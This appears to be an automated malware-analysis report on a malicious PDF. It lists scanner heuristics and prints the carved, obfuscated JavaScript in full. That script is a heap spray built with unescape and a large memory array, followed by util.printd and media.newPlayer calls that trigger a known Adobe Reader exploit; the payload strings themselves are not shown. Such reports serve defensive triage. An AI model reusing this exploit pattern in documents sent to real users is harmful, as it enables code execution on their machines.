MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE heuristic suggests the JavaScript is obfuscated, and a suspicious JavaScript file was extracted. This JavaScript is likely designed to download and execute a second-stage payload. The exact intent of the script could not be fully determined due to obfuscation, but the presence of JavaScript in a PDF is a strong indicator of malicious intent.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
/*9v6ZZ8Na*/for/*s<2jF795Rm|[X0*/(i=0/*u24AErC7C*/;i<W1o029.length/*N1zwY*/;){WoA=WoA+'%'/*IKzm<[j<RL@2*/+'u'+W1o029/*R\>*/[i+1]+/*fkb*/W1o029/*Dh:B*/[i]; i=i+2;} var Wo = unescape(WoA); var yR = unescape('%u3727%u27f5'); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0005_000.js |
pdf-javascript-stream | PDF /JS object 5 at offset 0x156 | 5320 bytes |
SHA-256: f2bc59b2257fb764227f8106e725325c4482f5638c00ab134b6bf2e634027d52 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var WoA="";
/*yiS<s`3NaNON*/for/*u\^`\Yx_E?i*/(i=0/*XCQG_et9w*/;i<W1o000.length/*qf853*/;){WoA=WoA+'%'/*0qXeZy`[nD*/+'u'+W1o000/*6Gz*/[i+1]+/*j:PiR*/W1o000/*eZr@Ua*/[i]; i=i+2;}
/*{|8<4>as`;v7K*/for/*v`61hcC5v0@Iz*/(i=0/*Hp<gB1aVM>Aw*/;i<W1o001.length/*ugd`q*/;){WoA=WoA+'%'/*LhXKbmqBy4*/+'u'+W1o001/*29J*/[i+1]+/*i<\mH8OWM*/W1o001/*@]s1c7*/[i]; i=i+2;}
/*<:FJ7?QT*/for/*DN^f<RU7T?J4\2*/(i=0/*EfZPrVh2[OmG*/;i<W1o002.length/*N8h2tn*/;){WoA=WoA+'%'/*TV={ih@i*/+'u'+W1o002/*QiQx*/[i+1]+/*W1*/W1o002/*bH7OUz\*/[i]; i=i+2;}
/*Y@[KG6zuoa=Q*/for/*T9hWg2kiU7IqqM*/(i=0/*bS]9_M2J_a*/;i<W1o003.length/*0|3*/;){WoA=WoA+'%'/*v7:GBv*/+'u'+W1o003/*K0VK*/[i+1]+/**/W1o003/*@AGhzZ*/[i]; i=i+2;}
/*bl|xYkb\mOEe5q*/for/*rGkc;hKw{sXX6]A*/(i=0/*gml2hPUi0fbt8*/;i<W1o004.length/*5Grl*/;){WoA=WoA+'%'/*Ho`s*/+'u'+W1o004/*R<yO*/[i+1]+/*J6R<|e*/W1o004/*]8GhC*/[i]; i=i+2;}
/*fw*/for/*4gBc]R<VjVw\EOD*/(i=0/*`2n[^Mwb*/;i<W1o005.length/*Y|wZ>_=*/;){WoA=WoA+'%'/*hUH5*/+'u'+W1o005/*D{AN*/[i+1]+/**/W1o005/*{lH[*/[i]; i=i+2;}
/*?p*/for/*3@k_0k\zKCuvj9_*/(i=0/*2{s45:<SQLD*/;i<W1o006.length/*f<hVZP*/;){WoA=WoA+'%'/*O7T<@{[X3n*/+'u'+W1o006/*[OpC*/[i+1]+/**/W1o006/*OV4e*/[i]; i=i+2;}
/*i64cESIWzAZ*/for/*ouR?q?RFg@dlt*/(i=0/*QCbk8SK]ro_Y*/;i<W1o007.length/*<KRKHt*/;){WoA=WoA+'%'/*PWx{v>mg3eOQ*/+'u'+W1o007/*ePT8*/[i+1]+/*hV*/W1o007/*N;3*/[i]; i=i+2;}
/*t2\3Fuuhc^B]w9*/for/*HGHUT>9SmC]PKh*/(i=0/*evu7h{xVg{\*/;i<W1o008.length/*eaLdOY*/;){WoA=WoA+'%'/*=E4D_Y*/+'u'+W1o008/*1TDf*/[i+1]+/*NHI1^*/W1o008/*a?6D\0*/[i]; i=i+2;}
/*2;m0CQEa*/for/*vmoAr_]E5SM{*/(i=0/*rA_@LIj*/;i<W1o009.length/*EE_{*/;){WoA=WoA+'%'/*9EJ;*/+'u'+W1o009/*LLz*/[i+1]+/*9I*/W1o009/*?fH*/[i]; i=i+2;}
/*j2fn`Y0MBh2:3t*/for/*fFZLi\I4YNu*/(i=0/*H8SKImFBw62*/;i<W1o010.length/*Na3uvl*/;){WoA=WoA+'%'/*Kr7*/+'u'+W1o010/*aey*/[i+1]+/*bZspX*/W1o010/*_{t5*/[i]; i=i+2;}
/*1R[q=8s\uD*/for/*5LPmHl?CyN>*/(i=0/*cyJ]9VaJ>||*/;i<W1o011.length/*BDvZw2*/;){WoA=WoA+'%'/*\7[*/+'u'+W1o011/*v:[*/[i+1]+/*6DITz5*/W1o011/*p4*/[i]; i=i+2;}
/*|ebmJl*/for/*c4<>P<JUUIW*/(i=0/*S9EqT62:;<vI*/;i<W1o012.length/*0;FAW*/;){WoA=WoA+'%'/*D4guV{*/+'u'+W1o012/*Te^B*/[i+1]+/*Z65Z?of_*/W1o012/*n<@z@qS*/[i]; i=i+2;}
/*Jq5mN6*/for/*Jz[RRalBZXBDlW*/(i=0/*uKC\:l0_|<I8*/;i<W1o013.length/*5a8lI*/;){WoA=WoA+'%'/*U>K*/+'u'+W1o013/*q;g:*/[i+1]+/*n8y\|:r*/W1o013/*8kRw*/[i]; i=i+2;}
/**/for/*@=Q3PM=h6y>*/(i=0/*W_a;Wj1MA*/;i<W1o014.length/*4sS*/;){WoA=WoA+'%'/*CE]5FhiA*/+'u'+W1o014/*yLx*/[i+1]+/*dE?G*/W1o014/*<9Ja3*/[i]; i=i+2;}
/*z84?V1;^*/for/*hDJQURCvI3gHUr*/(i=0/*FISlVg\*/;i<W1o015.length/*ZK9*/;){WoA=WoA+'%'/*fE??i*/+'u'+W1o015/*dl2*/[i+1]+/*l8`fC*/W1o015/*medv*/[i]; i=i+2;}
/*wu{|EZp6*/for/*3L]TI_Ax<S6*/(i=0/*s_5]cke*/;i<W1o016.length/*GaEt2js*/;){WoA=WoA+'%'/*gJhgc*/+'u'+W1o016/*mkzB*/[i+1]+/*s3*/W1o016/*Zsd*/[i]; i=i+2;}
/*66_5*/for/*{THtlV\WoNS*/(i=0/*LtvV9PLN8*/;i<W1o017.length/*xfdR8Lb*/;){WoA=WoA+'%'/*HqHwNF<*/+'u'+W1o017/*x76l*/[i+1]+/*A<v|q5=]*/W1o017/*Y?UFB*/[i]; i=i+2;}
/*N^r=^HZ[NL9*/for/*{WD@9:9mzKuZF*/(i=0/*rL<|X7RM2[*/;i<W1o018.length/*zKgQ{`*/;){WoA=WoA+'%'/*Cjh6*/+'u'+W1o018/*L^1*/[i+1]+/*v*/W1o018/*GLz*/[i]; i=i+2;}
/*l>w{s4mCfL2*/for/*koEBa@QlroogR1q*/(i=0/*E||VbBe|*/;i<W1o019.length/*M;{X]*/;){WoA=WoA+'%'/*h@p5*/+'u'+W1o019/*s?[l*/[i+1]+/*g*/W1o019/*En*/[i]; i=i+2;}
/*XaAEjlSj[Yp{Q3*/for/*@sv:1hAiI1vQikB*/(i=0/*jYPgToWRX5*/;i<W1o020.length/*f6AQt*/;){WoA=WoA+'%'/*anO*/+'u'+W1o020/*U`7*/[i+1]+/*aWQ657Q*/W1o020/*5O|S*/[i]; i=i+2;}
/*xp*/for/*PfF]SZ?70unJa*/(i=0/*WUdFtAm8bP@*/;i<W1o021.length/*IBk*/;){WoA=WoA+'%'/*vgF79N*/+'u'+W1o021/*mOv*/[i+1]+/**/W1o021/*LL7uX:C*/[i]; i=i+2;}
/*bd?iMyG\1Ue62*/for/*N]e;FQ@hBdxZZ`a*/(i=0/*5uj2FpzrJUlE*/;i<W1o022.length/*;z<jF*/;){WoA=WoA+'%'/*yPPS2*/+'u'+W1o022/*K[w*/[i+1]+/*h:0W>7Yn*/W1o022/*CO3V*/[i]; i=i+2;}
/*318d7Kqe7S\UW>*/for/*cYK18R\Us04g5q*/(i=0/*Ec?u\`P5lW][*/;i<W1o023.length/*CQ_*/;){WoA=WoA+'%'/*3_QMqC*/+'u'+W1o023/*62T*/[i+1]+/*aQlxi^*/W1o023/*le*/[i]; i=i+2;}
/*yb3Fme7*/for/*E7P<6F?5uP1Jx*/(i=0/*pG8sY6Rw6p*/;i<W1o024.length/*VpLw*/;){WoA=WoA+'%'/*5rMquDM*/+'u'+W1o024/*lbl*/[i+1]+/*ZvX*/W1o024/*3>=*/[i]; i=i+2;}
/*[@sZFjy=W2:Wr*/for/*Q9\|W;3T:[:9:Q4*/(i=0/*Z60V6sNgMk=ln*/;i<W1o025.length/*ER7WnFC*/;){WoA=WoA+'%'/*iS[9^ZX:^k*/+'u'+W1o025/*9`?*/[i+1]+/*M2wVnfwt*/W1o025/*YaC7*/[i]; i=i+2;}
/*HD]bV7@xhmCR*/for/*HJ4[Ya:a|g>9*/(i=0/*VP|coT\X2>d*/;i<W1o026.length/*GgqV*/;){WoA=WoA+'%'/*jvmP_t5zK8t*/+'u'+W1o026/*y`Z*/[i+1]+/*0D92*/W1o026/*N0yR*/[i]; i=i+2;}
/*3bU3v?GwI*/for/*uHPG^>6z4l4;ac*/(i=0/*?JkKLnB:*/;i<W1o027.length/*M5D8AX*/;){WoA=WoA+'%'/*3bQUAMEbEC\*/+'u'+W1o027/*Lx9*/[i+1]+/*tO;i*/W1o027/*yMK?Jc]*/[i]; i=i+2;}
/*g>i|UPh5gFq*/for/*^gIUZ0eqxg18cdl*/(i=0/*wArlul8D*/;i<W1o028.length/*uos[?Xl*/;){WoA=WoA+'%'/*tA7adE:7z9x^*/+'u'+W1o028/*>fcU*/[i+1]+/**/W1o028/*zhT_QI*/[i]; i=i+2;}
/*9v6ZZ8Na*/for/*s<2jF795Rm|[X0*/(i=0/*u24AErC7C*/;i<W1o029.length/*N1zwY*/;){WoA=WoA+'%'/*IKzm<[j<RL@2*/+'u'+W1o029/*R\>*/[i+1]+/*fkb*/W1o029/*Dh:B*/[i]; i=i+2;}
var Wo = unescape(WoA);
var yR = unescape('%u3727%u27f5');
for(i=0;i<15;){yR+=yR;i ++;}
yR=yR.substring(0,32768 - Wo.length);
memory=new Array();
for(i=0;i<0x2000;) {
memory[i]= yR + Wo; i ++;
}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {var obj = this.media;obj['new'+'Player'](null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.